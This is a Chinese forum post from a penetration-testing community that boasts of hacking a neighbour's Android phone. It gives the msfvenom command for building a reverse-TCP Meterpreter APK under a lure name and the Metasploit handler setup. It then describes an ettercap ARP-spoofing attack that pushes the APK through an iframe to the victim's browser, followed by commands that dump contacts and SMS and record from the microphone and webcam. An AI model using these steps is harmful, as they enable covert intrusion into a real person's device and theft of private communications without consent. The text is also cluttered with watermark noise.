中国网络渗透测试联盟

标题: metasploit+ettercap中间人攻击成功入侵邻居手机 [打印本页]

作者: admin    时间: 2018-10-20 20:30
标题: metasploit+ettercap中间人攻击成功入侵邻居手机

2 Z5 E( F' C" s: K3 p" |$ { 五、msf+ettercap入侵邻居安卓手机 - m2 e% \) V/ Z# K) V3 B

& P( T' O4 n6 P5 ?+ M0 p, N4 D! `

% e% i) ^% c+ ^0 p8 n) `, v 首先启动msf + m k% M8 A0 p# B% c

- L' u+ i5 q5 H

, h8 I, F# x: I3 b( Q) A 先用kali生成一个安卓木马,如下命令: 9 r) k. y$ J& C+ @( N

% o. e/ Z+ T0 I" R$ T

7 Q9 `% a% d& O0 o8 a; _1 e4 z. x Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk - o# R9 r, j( Q- ]3 v" c7 ]; i! X

/ b+ ^% w( e# Y) f* A8 h

/ }, |: f! ]0 r8 }/ K 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 , k7 t, D L+ I0 @1 | O8 i

# C; M- A/ L7 n1 O1 S; n

5 U; ?! z+ [- `! Y# L 然后进入msf ) v2 e+ \$ z$ b4 o* o

5 S) g) h7 k4 Z" C( V l/ X

, `$ R8 `$ g4 { use exploit/multi/handler 2 s) a5 n* T& j* [

7 x( L7 f0 B0 g& d

0 a) ]- D7 D+ X+ ^& X; j set payload android/meterpreter/reverse_tcp 2 o$ W* r. c# Y& q

! c# ~ o: r$ t' D$ I: B

3 ]5 A2 l: S- y; ~, H6 |4 y; L set LHOST 192.168.0.109 //ipkailiip $ H' C- T! P+ z! I, ~

0 q" x0 o& x: p+ {- n; ~. l7 _

& ^6 J; Y8 S9 g0 l" B set LPORT 44444 //端口一定要与前面生成的木马的端口一致 ! q1 j( V" o4 V5 j

7 k v5 U6 l) y* i3 B. p

, d4 u* F/ g y' I( p- z Exploit ; A% c e$ D% G+ a% K1 E& ]9 {4 [

( u: x" p2 Z" X* u% M% h1 t @; H

- V1 T3 e% Q* {   # {% Q2 E7 L* R' _. O3 x

' \' A- A0 t/ H3 q8 D/ a

' y* A# X& l6 d$ O* w2 Z 下面我们开启ettercap -G 3 z8 `: L1 T5 j( D6 C ~8 {

& G# F2 ]! d7 E

' [7 t( e. L8 W Z N/ p- q' W 我物理IP ; o' E0 W. I3 T1 @7 l% V

& [6 J6 I" E* b2 u6 w7 s# q

" w9 |2 Y! b) q/ a+ v2 e; Y9 A   + T- v6 }, z1 s; Y3 B

# g, w, G2 t- O1 U

; _. Y: F& ^/ n/ C% Z4 N 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, - H7 H& j; d$ V( P2 w2 o1 x

& K( z7 Q! f. b% E# y$ d

! @1 ]: U( v0 H. ]% t0 ] 下面我们来设置一下 / X% f1 v1 I: C! J( t0 @# B

3 g. G- y J1 q6 _

7 O2 f4 Q. q; D2 Q1 \, Y   $ j" s9 c7 J4 h! W, E; e6 `( B

; h, f+ H+ w4 M' a K

7 o, @& l6 d$ K+ T 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, $ ~7 `) V( z" M9 q) S, S

, A8 D/ h3 j. t, ~, s% E) y. r

+ y2 z( Q$ g$ N5 w4 l   ) I4 c4 l3 f) @! g( Q8 k

* G, Q' p' [9 m- W# k, f$ t

" B! g5 O8 X! r& t- S! r# q   + m. M. k8 {5 t9 J( f

4 ^* ^3 s; X/ S9 x1 e

/ Q, c- @6 \" |! A* |7 A   3 Q+ I% ?$ L$ }! w6 X0 T

4 V( ^- @& f4 R

; G. `( t/ H6 N; h   K1 P8 L# ?. E4 j- P& J- ^; A

# z* g( ?8 X1 ~" Q

* E, `' ^& O8 K% D4 R   . m( g/ B7 F. D2 ^3 R

7 Q1 G' s2 r: d* |" E6 ]

4 y6 @' g2 J( m- s! m   " h- z2 F" s4 V) [$ h- Y. S

& j# m6 l3 i, |$ i8 V# f+ b7 m

. k6 C& t& t( p: @, [   % A% [+ e* H6 m: Z+ ~

9 _3 x, k' s. l. _: n: O3 z1 q" Z

+ v7 v1 ?0 b2 I' f   R) f, v: O3 g" Q9 b

& [3 C7 o0 z s; e5 ?, v) R

5 P# _- j( } |- G9 o: m   4 _, ^3 W7 \2 v5 x

. A! s j% B* [0 w3 L S& x

6 h( K) B5 m$ {   ! W9 A. S5 [- y9 |; B; [

3 A u6 G y1 S5 y+ Y3 o

- ^" n$ I% O2 s k/ K   ! ], G% E$ \+ N4 t

& d# N# Z* e) s1 z8 f

) J4 M' V1 V8 m. @   ; i% \/ i6 ~2 q5 b2 a& ?

/ \* { [) o& k% N% ^8 T

/ }/ E2 W' T$ n5 O   7 u/ }8 [ g& h* M* M( c

" H r* ^7 I" O7 b) K1 K

( J$ Q" C( J, \6 l* L6 [6 o i' G 下面我们开始攻击 , v3 ^9 I% l: N, ] D. c: `

2 ?; g/ Z6 X: x" k( i1 D

[2 G% r' O: a   . F3 |, r: L1 q' b$ q) G& x

. Q5 e3 [" d; v; E" d! |4 m

' N1 Z' `2 w8 J7 f. [   1 B, o6 ?7 u" r5 O' Z1 F# U

# G% C8 m% ^2 ]; C

0 T. ~/ p1 s+ ~4 n4 x   ]2 M& t- `5 m# z) g7 H3 p

1 p$ w' B% |! r9 b y3 a

! G) _. t# |& B, @9 ?   ) L; l, n; ~. e0 r; I+ O

! t) a* L; L/ Z; I3 Z# R ]

: y* A2 W) w( S4 ~$ |   - d, m% m+ ~3 v" _

, p7 U+ a$ Z+ E4 \& s& l

/ C0 G2 d4 E. A: p: V& m 大概过了5分钟多,发现反弹成功了 1 Q$ U0 r8 S9 h

0 _: R1 T8 I5 U2 F* n

, Q/ D7 {( g' d& ?! _. v   ( c; P# r1 [; h8 R$ s d" p V

2 B' t4 A9 X4 H. W/ n; \

1 q, M% d |$ s   * f' J$ w5 l, M; s5 f

5 u8 _* Q: y* D, _$ V' C1 U8 K

( P$ v' x' E2 O9 D8 k5 H; D   % \- U6 k3 x% A7 G

3 L4 F& m* Q+ |; g7 ]- F, M! x

; h! p& K2 _- q3 R( f   : d# N0 l2 K. s' X4 w- m

' }& X6 z: y. o) x& d/ D, L

/ n7 ?+ W6 F6 y& |3 V6 h5 T& g) v+ t! b   ; p; h' U0 }+ C5 H

, \7 k, m9 K) e4 V8 L l9 K

, t9 H; r$ j4 ^   3 q$ \" `0 G$ A

. H- z: t5 m, W4 {

% ?& z& h( Q! G* p1 A1 v& Q6 w   6 R. X$ f1 X' d. i2 V3 L

8 l. P% e7 |9 ^8 K# P

4 _! P4 F7 d# ?+ v& Q 执行命令 5 \, R& Z. G2 f- R3 |% P9 v$ i

! {8 N& V' ~) H0 P

+ i% p) E: G" B' L; g1 Q   & U' d, s1 P( ^$ @1 B- L. P' x9 t$ b

5 h0 Z2 P8 v$ N2 O! B% M

+ f! L6 Y" ~) s+ x; g( P( @ dump_contacts    --》这个是导出电话 0 r! _! |$ ?5 @

" J( f8 Y- K2 v3 e$ l

* n2 W/ @: M1 i V: Q dump_sms --》这个是导出信息 1 c- }7 ?, _3 v! J2 I8 i6 F5 `

7 |/ z$ F6 }8 N2 G" B5 |- t

8 N) S# C: e; i- H record_mic     Record audio from the default microphone for X seconds - e$ l& R) p( [) j9 }+ C

2 B* _6 i r1 P6 L3 {% r6 r

( M( [: J2 |8 B) R" P4 W+ G     webcam_chat    Start a video chat 9 z! ], |1 U/ U. y/ [% [

5 H' u% [2 @: \% S, B( ^+ |$ e3 s% s# d

* g7 r8 \ f9 a$ ~     webcam_list    List webcams " i8 l, @ \4 @$ {6 [7 z

9 J, ^6 c g( y G* ?! \6 E0 R0 n( E

! `9 c5 k7 x1 l( B, P, e7 @ G8 M V     webcam_snap    Take a snapshot from the specified webcam ' e% n9 Y( D' C. l, I k6 ? N R

+ y. {$ V/ N' l0 @' e

& r0 r, D, U. u5 c* F! X+ K. h webcam_stream  lay a video stream from the specified webcam : ] I$ ?" [* `

5 q* w# n! @% u: G- t+ | l

+ {! {* `* }& b5 e# {" X, T! X! d2 X   ! o' s' z) I5 w% J/ |# Y

4 H( V% M2 b4 K4 ? T! n* h) w

% [; h% Q0 x) _+ }   4 _5 } s7 T' Y$ \

. ^6 E* V! ]* R- U3 u2 J6 |) o

- T4 c+ }; w; o 我们打开看一下电话薄, % V- r A1 L. z$ t

; b6 Q& z3 T# _0 X7 [

8 Y8 r6 b, V7 l* }7 }: P   9 P j# `- I2 {, K- K# M/ w

! E, [- \' [8 k5 V

: T" _1 R, k0 P) S8 l7 @: b   6 U$ L. S: m6 f

8 h7 h x9 Y/ Z/ w6 X7 {

2 c! R" p5 D8 K2 L   9 Q2 ^6 C0 s$ _' f0 d9 e2 G

5 _+ z Y, `# L4 W

" d7 [7 H) _ u6 s& D   ! h: U1 `+ A% c( ^

3 S6 P. _6 Q9 [! }- O" ]. N

+ ^2 T: x8 X8 Y9 Q8 ]( s   - g/ J/ f* X. t; H, z: Q

5 g- W7 h Q. O/ ^: r* q# h

0 k3 s( V6 _2 \6 T9 S   ' e: V6 ~6 H) ]

$ n( w+ x- Y3 C; F& _* ^

& j- X0 J% @( j; X2 P! d8 K0 v 我们同时欺骗成DroidJack木马,使用方法如图: - ^+ ]5 g% |' h9 q

( C g- R3 n2 E9 E+ h

7 ?7 ~4 s8 s3 E @   3 F' Y/ |. t* K# c% Z: h7 E9 d

+ \* c3 I! j7 L: d: ^

, m5 @# M& y- O0 A6 |7 H7 L   ! ]% Z* j9 |6 @# F

0 }$ L" K4 c# I: Q+ M

/ _6 U/ Y. |' l+ T2 i, Z' c   ) ]; {) ?) {8 [7 r& h0 u

& o. k3 ^" v$ n/ u

5 A3 }0 t6 K3 z5 a" ^$ O7 c 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 / x( L( A' ^. p8 Y8 r* Y

/ @, i) M& A5 {

4 R8 W, ~* U$ w2 @+ C+ R   : z2 @" A, c' \& ~7 ]

/ w" U8 w3 \: D X

' n H6 k6 y# ~9 x5 z# T8 b   ; g8 R/ H+ @: o9 t0 i

[8 Z3 _, \* O, v# `) L

* r* P8 I2 }1 Q+ b   & [4 ^8 j. ` z0 _

# _+ j( c! r" G% f9 ^% Y

! V2 r/ }: k3 l/ s- J0 S. ? 3 s; h R0 q4 {% a$ T% U& D

) H$ l- u( Q- g3 ]' n; g

$ k A m3 h* e! \3 F5 J Q3 k
+ g: V& n; y0 u2 _3 C






欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2